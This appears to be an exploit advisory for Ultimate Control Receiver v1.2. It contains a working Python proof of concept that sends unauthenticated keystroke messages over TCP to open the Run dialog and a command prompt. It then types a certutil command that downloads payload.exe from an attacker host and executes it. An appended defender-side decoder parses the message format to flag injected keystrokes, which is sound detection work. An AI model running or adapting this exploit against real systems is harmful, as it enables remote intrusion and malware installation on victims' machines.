📄 Ultimate Control Receiver 1.2 Remote Code Execution

🗓️ 04 Aug 2025 00:00:00
Reported by Chokri Hammedi
Type: packetstorm
🔗 packetstorm.news

Ultimate Control Receiver v1.2 suffers unauthenticated remote code execution via keyboard input on Windows 10.

Code
    # Exploit Title: Ultimate Control Receiver (v1.2) - Remote Code Execution
    # Date: 2/08/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.negusoft.com/
    # Software Link: https://www.negusoft.com/ucontrol/downloads/pc.html
    # Version: 1.2
    # Tested on: Windows 10
    
    
    '''
    Description:
    
    Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code
    execution. An attacker can exploit the keyboard input functionality over
    TCP to execute arbitrary system commands on the target machine without user
    interaction.
    
    '''
    
    
    import socket
    import time
    import struct
    
    TARGET_IP = "192.168.1.203"
    TARGET_PORT = 13894
    LHOST = "192.168.1.63"
    
    VK_RETURN = 0x0D
    VK_LWIN = 0x5B
    VK_R = 0x52
    
    def create_type_char_message(character):
        msg = bytearray(32)
        msg[0] = 18
        msg[1] = 18
        char_code = ord(character)
        struct.pack_into(">I", msg, 4, char_code)
        struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
        return msg
    
    def create_key_input_message(vk_code, input_type=0, command=False):
        msg = bytearray(32)
        msg[0] = 17
        msg[1] = 17
        flags = 1 << 4 if command else 0
        msg[2] = flags
        if input_type == 0:
            msg[3] = 0
        elif input_type == 1:
            msg[3] = 3
        elif input_type == 2:
            msg[3] = 1
        struct.pack_into(">I", msg, 4, vk_code)
        struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
        return msg
    
    def send_character(sock, character):
        sock.send(create_type_char_message(character))
        time.sleep(0.05)
    
    def send_string(sock, text):
        for char in text:
            send_character(sock, char)
    
    def send_win_r():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(5)
            try:
                s.connect((TARGET_IP, TARGET_PORT))
                s.sendall(bytes([3, 3] + [0]*30))
                s.recv(32)
                s.send(create_key_input_message(VK_LWIN, 2, True))
                s.send(create_key_input_message(VK_R, 2, True))
                s.send(create_key_input_message(VK_R, 1, True))
                s.send(create_key_input_message(VK_LWIN, 1, True))
                time.sleep(0.5)
                return True
            except Exception:
                return False
    
    def send_cmd_command():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            try:
                s.connect((TARGET_IP, TARGET_PORT))
                s.sendall(bytes([3, 3] + [0]*30))
                s.recv(32)
                command = f"certutil -urlcache -f http://{LHOST}/payload.exe \\windows\\temp\\payload.exe && \\windows\\temp\\payload.exe"
                send_string(s, command)
                s.send(create_key_input_message(VK_RETURN))
                return True
            except Exception:
                return False
    
    def main():
        if not send_win_r():
            return
        time.sleep(3)
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            try:
                s.connect((TARGET_IP, TARGET_PORT))
                s.sendall(bytes([3, 3] + [0]*30))
                s.recv(32)
                send_string(s, "cmd")
                s.send(create_key_input_message(VK_RETURN))
                time.sleep(2)
            except Exception:
                return
        time.sleep(3)
        if not send_cmd_command():
            return
    
    if __name__ == "__main__":
        main()
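
A defender-side decoder for the 32-byte message layout the PoC above uses, run over reassembled traffic to flag remotely injected keystrokes. This is an added example, not part of the original advisory or the vendor's code. The field meanings (byte 0 type, byte 3 key action, big-endian code at offset 4) and the action names are inferred from the PoC, and the sample connections are constructed and type benign text.

```python
import struct

MSG_LEN = 32                        # every message in the PoC is 32 bytes
T_HELLO, T_KEY, T_CHAR = 3, 17, 18  # byte 0 values the PoC sends
VK_RETURN, VK_LWIN, VK_R = 0x0D, 0x5B, 0x52
ACTIONS = {0: "press", 1: "down", 3: "up"}  # byte 3; names inferred from PoC ordering

def parse_stream(data):
    """Decode a reassembled client-to-receiver byte stream into event tuples."""
    events = []
    for off in range(0, len(data) - MSG_LEN + 1, MSG_LEN):
        msg = data[off:off + MSG_LEN]
        (value,) = struct.unpack_from(">I", msg, 4)  # big-endian code at offset 4
        if msg[0] == T_KEY:
            events.append(("key", value, ACTIONS.get(msg[3], "?")))
        elif msg[0] == T_CHAR:
            events.append(("char", chr(value) if value < 0x110000 else "?", None))
        else:
            events.append(("hello" if msg[0] == T_HELLO else "unknown", msg[0], None))
    return events

def findings(events):
    """Return alert strings for one connection's decoded events."""
    alerts, held, typed = [], set(), []
    for kind, value, action in events:
        if kind == "key" and action == "down":
            held.add(value)
            if value == VK_R and VK_LWIN in held:
                alerts.append("Win+R (Run dialog) injected remotely")
        elif kind == "key" and action == "up":
            held.discard(value)
        elif kind == "char":
            typed.append(value)
        elif kind == "key" and value == VK_RETURN and typed:
            alerts.append("typed text submitted: " + "".join(typed))
            typed = []
    return alerts

def sample_msg(mtype, action_byte, value):  # builds one constructed test message
    return struct.pack(">BBxBI24x", mtype, mtype, action_byte, value)

HELLO = sample_msg(T_HELLO, 0, 0)  # samples below are constructed, not captured traffic
SAMPLE_CONN_1 = HELLO + b"".join(sample_msg(T_KEY, a, k) for a, k in
                                 [(1, VK_LWIN), (1, VK_R), (3, VK_R), (3, VK_LWIN)])
SAMPLE_CONN_2 = (HELLO + b"".join(sample_msg(T_CHAR, 0, ord(c)) for c in "notepad")
                 + sample_msg(T_KEY, 0, VK_RETURN))

if __name__ == "__main__":
    print([findings(parse_stream(c)) for c in (SAMPLE_CONN_1, SAMPLE_CONN_2)])
```

Feed it the client-to-receiver payload of each TCP connection to port 13894 as reassembled from a capture; a trailing partial message is ignored.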
